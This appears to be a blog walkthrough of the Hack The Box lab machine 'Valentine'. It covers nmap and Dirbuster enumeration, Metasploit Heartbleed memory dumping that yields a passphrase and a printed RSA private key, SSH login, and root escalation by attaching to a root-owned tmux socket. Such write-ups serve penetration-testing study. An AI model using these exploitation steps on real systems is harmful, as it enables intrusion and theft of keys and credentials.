Valentine

Enumeration

NMAP

The nmap reveals three active services listening on port 80 http , 443 OpenSSL, 22 ssh.

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
|   2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_  256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesnt have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after:  2019-02-06T00:45:25
|_ssl-date: 2021-05-13T09:00:42+00:00; +3m55s from scanner time.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 3m54s

Dirbuster

Dirbuster reveals /dev/ folder which contains two files of interest.

/dev/hype_key

Contains the hex value of a private rsa key.

/dev/notes

To do:

1) Coffee.
2) Research.
3) Fix decoder/encoder before going live.
4) Make sure encoding/decoding is only done client-side.
5) Don't use the decoder/encoder until any of this is done.
6) Find a better way to take notes.

Exploit w/ Metasploit

The first thing we see is a woman and a bleeding heart on the index page. Weirdly enough there is an OpenSSL vulnerability called heartbleed.

I am running an auxiliary module to check if the vulnerability exists for this machine. Then I am going to exploit the vulnerability by dumping the information from the memory of the server.

msf6 auxiliary(scanner/ssl/openssl_heartbleed) > exploit

[+] 10.10.10.79:443       - Heartbeat response with leak, 65535 bytes
[*] 10.10.10.79:443       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set action DUMP
action => DUMP
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > run

[+] 10.10.10.79:443       - Heartbeat response with leak, 65535 bytes
[+] 10.10.10.79:443       - Heartbeat data stored in /root/.msf4/loot/20210513073901_default_10.10.10.79_openssl.heartble_912349.bin
[*] 10.10.10.79:443       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

I am going to use strings to check the contents of the binary file produced by heartbleed. The output reveals a base64 text string.

$ sudo strings /root/.msf4/loot/20210513073901_default_10.10.10.79_openssl.heartble_912349.bin                 1 ⨯
[sudo] password for kali: 
0&J/
u8DF
ux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Referer: https://127.0.0.1/decode.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==
.Dl[
/m:t w
wHXpq
N[xckM
t]Sd
fwF)u`
1MC&
P0N0
["lr
["lr
'760{pu
.Dl[
/m:t w
wHXpq
N[xckM                

The decoded version of the text value is heartbleedbelievethehype and I guess it is a passphrase.

$ printf "aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==" |base64 -d                                                     1 ⨯
heartbleedbelievethehype

Next thing I wanna do is search for other actions that are available on this module.

msf6 auxiliary(scanner/ssl/openssl_heartbleed) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------
   DUMP  Dump memory contents to loot
   KEYS  Recover private keys from memory
   SCAN  Check hosts for vulnerability


msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set action KEYS
action => KEYS
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > run

[*] 10.10.10.79:443       - Scanning for private keys
[*] 10.10.10.79:443       - Getting public key constants...
[*] 10.10.10.79:443       - 2021-05-13 11:42:28 UTC - Starting.
[*] 10.10.10.79:443       - 2021-05-13 11:42:28 UTC - Attempt 0...
[+] 10.10.10.79:443       - 2021-05-13 11:42:30 UTC - Got the private key
[*] 10.10.10.79:443       - -----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAwygXrPgZKkHSij/OeRwZ9PtI+tMvM2tvyJz5o78ZZqihjfki
Yg7hnkVQH1kvrLqVz68jqlTJZEAPJajF3cvEHIcM0nMSLnd2z4lI+zlK4fU9QMO1
moJo9o2Msk0/TwMJwLqtdF1TZLBXakQPH7f2+wWIrrLByt6m+8Vmd0YpdWDQr5Hd
WTA6C4+FIeVdyCIcVup6Lw0nXOKn1i5VRheHItUbZmIlhfoJHDhtGxSeqXrgMU1D
Js6wkebQm0jYz095+a8SRNRl5P93R1aFTTvprdtN6y0pl/hampnDrRcabHOkBB/l
1Y6ox6YgrorgULjxstJI3n2ziQ226G3Ho4JelwIDAQABAoIBAQCWkqd5wE6CSRjt
q/9deC4a04riY/CmJr2vtlXyXi52A6Pqi49YwwyW9fm0xjY/ehK+k+3brOFZ5QcK
0mYgE+iy7gwZj8k2atwTkmPp2bGKF5J0FsxWc0oS+PHWXD19c+Wheyb7gkomhNxd
VDerDGCWGxXzXF6jbRi/ZvYBDvRL59YOvXmdQa3MKykGywUn+NFZvUxICyEma24K
5ABMIWm5cTmDzm5Cd5/wn5Pu4tY0TIzfoa3KnA+M8vpmd4xgRGWGpatFKrM3LqSq
W0+Rr81Ty/R7lr1DkLDKp1ltvCl3pp1Lkoo3Ublk38C6gHHS3Vfs6h+QJfNgjeQu
RyKqm3H5AoGBAPFMTE9WpalFjB0u+hHNbFRfRet8480wa5702AEDK/cHi0U+R9Z0
Va/qm7PtzBP/m4nUXJwZbvG9O2PKXusGmgIBc/jqSQpQriIvBb27AJiq65Jd7tJ4
AiNZm6v/bFChFmWhdZe1S4vBgnlYoRWHsu+3JJpMJFKZYYl9O/X8ZWdtAoGBAM8M
F8KO2EtVQUrosnZQfn+2pLbY4n4Q66N3QaBeoqY7UipBJ1r3jIfupiw5+M1gEXvB
gnQmRLwRAA7Wmsh0/eCxeOk7kgNr7W8nNdxwp0Uv06h1CtEqvFIuXab5pYG5/QKs
habSXxY02QuaVgM/vXBTSOO0TC/7Rm6ORJzAxAeTAoGBAOakinBvnwuMmaAvjgJE
O57uLlQoXUp9VPFskaduE7EdOecm393B90GeW9QBoccf1NlK7naa7OwOd90ry8yU
09LE9shfkQ9WDQxJrBAt1iUXgvK17Jiq80g818rw6+SqBVGBongvZ5WfkwpQSDDf
M49knI0L6NA3If8cgJrg9UCFAoGBAK1DJmL23MP13UTNhAKEi8deVWp6BteOW1KZ
Cr8kUqIfRDv99+wk+mIKcN7TyIQ9H4RbxEpkd+KVq2G/bxnO5WFxwogTBLZ+S9xX
iLgnQaMhSdNP1rSBOcTf7hk8EqeDt9nT+6hFpbLUmMkf51iir2nfGEEM8TC56w+7
WGmA2sqnAoGAUyztn0Sc08xny1oGQXjVcVy/KsszYNfaF2y4i6tsbDsD2HfzRvbp
zeSeXxopyjjMTKCIMONh88JFeJoctmsLg2eG3uFw5c+wvD+GBafFfufvf2Xz183h
05q+RVlBncSiUayk33RtWi0Csl9L3prrGKh9RLUBmkSZ/E90ATxE92w=
-----END RSA PRIVATE KEY-----

[*] 10.10.10.79:443       - Private key stored in /root/.msf4/loot/20210513074230_default_10.10.10.79_openssl.heartble_001596.txt
[*] 10.10.10.79:443       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Now that I had a passphrase and a private key, I tried to login with usernames such as admin, bleed, heart, heartbleed, bleedheart, valentine and others. In the end I had to enumerate where I was mistaken and figured out that I had missed something. In the /dev/ directory there is a secondary file called hype_key which not only contains a HEX value of a private key but it also tells me that the owner of the private key’s name is hype. I have inserted the hex value to a hex-to-text and received a second private key. Now all I have done is copied the private key to a file, changed its premissions to 600 and sshed to the box with the previously found passphrase.

# ssh -i web_key [email protected]
Enter passphrase for key 'web_key': 
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Fri Feb 16 14:50:29 2018 from 10.10.14.3
[email protected]:~$ 

There are many ways to achieve root on the machine. The output from the linuxprivchecker.py revealed SUID files of interest, processes such as tmux(owned by root) running a dev_sess socket and DirtyCow kernel exploit among others. I have chosen to go with the tmux one to save up some time.

[email protected]:~/Desktop$ ps aux
...snip...
root       1020  0.0  0.1  26416  1672 ?        Ss   01:59   0:05 /usr/bin/tmux -S /.devs/dev_sess
...snip...

[email protected]:~/Desktop$ tmux -S /.devs/dev_sess
[email protected]:/home/hype/Desktop# whoami
root

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: